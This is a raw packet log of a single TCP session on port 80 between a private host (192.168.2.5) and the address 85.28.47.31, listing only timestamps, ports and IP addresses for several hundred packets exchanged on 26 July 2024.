Jul 26, 2024 20:09:12.821451902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821484089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821508884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821518898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821527958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821564913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821568966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821602106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821614981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821635962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821650982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821670055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821698904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821703911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821718931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821753025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821851015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821883917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821907043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821914911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821928024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821948051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821959972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.821981907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.821999073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.822019100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.822031975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.822067976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.822109938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.822138071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.822160959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.822170973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.822180986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.822204113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.822216034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.822236061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.822254896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.822268963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.822284937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.822303057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.822316885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.822335958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.822350025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.822384119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827035904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827145100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827148914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827192068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827194929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827229977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827243090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827260971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827284098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827295065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827312946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827346087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827378035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827409029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827426910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827440977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827459097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827472925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827491045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827506065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827523947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827538967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827553988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827573061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827589989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827620983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827709913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827743053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827759027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827775002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827790976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827807903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827821970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827840090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827857018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827876091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827889919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827910900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827924013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827944040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.827959061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.827995062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.828083992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.828115940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.828129053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.828149080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.828161955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.828181982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.828193903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.828213930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.828227043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.828247070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.828258038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.828289032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.828300953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.828329086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.828347921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.828373909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.833760023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.833812952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.833828926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.833842039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.833858967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.833885908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.833893061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.833925009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.833935976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.833956957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.833967924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.833992004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.834001064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.834028959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.834043026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.834072113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.834549904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.834599972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.834605932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.834636927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.834642887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.834681988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.834713936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.834745884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.834758043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.834779024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.834785938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.834810972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.834821939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.834851980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.834875107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.834923983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835037947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835068941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835091114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835103035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835112095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835134983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835148096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835167885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835177898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835201979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835215092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835246086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835654020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835689068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835717916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835721970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835727930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835755110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835762024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835788012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835798979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835819960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835832119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835850954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.835864067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.835896015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.910695076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.910732031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.910749912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.910768032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.910782099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.910784960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.910801888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.910815954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.910820007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.910840034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.910868883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.910885096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911010981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911027908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911042929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911057949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911060095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911075115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911081076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911089897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911115885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911135912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911365986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911401033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911431074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911432981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911462069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911467075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911485910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911499977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911528111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911535025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911550045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911585093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911710978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911746025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911772966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911780119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911797047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911813974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911832094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911848068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911874056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911883116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.911897898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.911931992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912101984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912142038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912173033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912175894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912193060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912209988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912231922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912244081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912276983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912282944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912303925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912312984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912333012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912347078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912374973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912381887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912391901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912410021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912434101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912461996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912513971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912529945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912544966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912559986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912565947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912586927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912610054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912703037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912755966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912812948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912828922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912843943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912859917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912869930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912887096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912919998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912936926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.912949085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912970066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.912983894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.913167953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.913183928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.913202047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.913213015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.913259029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.913259983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.913350105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.913364887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.913403988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.913424969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.913441896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.913458109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.913474083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.913490057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.913491011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.913506031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.913511992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.913521051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.913531065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.913531065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.913554907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.913568974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.918437958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.918466091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.918482065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.918499947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.918534040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.918534040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.918648005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.918664932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.918679953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.918701887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.918704987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.918725967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.918754101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.918754101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.918956995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.918973923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.918989897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.919004917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.919007063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.919020891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.919028997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.919037104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.919053078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.919063091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.919069052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.919084072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.919089079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.919118881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.919120073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.921612978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.921628952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.921644926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.921659946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.921670914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.921675920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.921691895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.921696901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.921706915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.921715975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.921722889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.921731949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.921739101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.921753883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.921767950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.921771049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.921797991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.921821117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.924967051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.925015926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.925045967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.925045967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.925071001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.925121069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.925127983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.925149918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.925179005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.925179958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.925209045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.925240993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.925246954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.925295115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.925492048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.925571918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.925642014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.925673008 CEST	80	49704	85.28.47.31	192.168.2.5
